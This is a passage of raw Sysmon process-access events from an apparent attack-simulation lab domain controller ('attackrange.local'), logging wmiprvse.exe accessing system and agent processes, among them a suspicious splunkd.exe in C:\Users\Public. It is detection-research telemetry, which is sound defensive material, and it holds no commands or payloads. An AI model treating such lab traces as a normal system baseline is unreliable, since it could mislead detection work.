Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0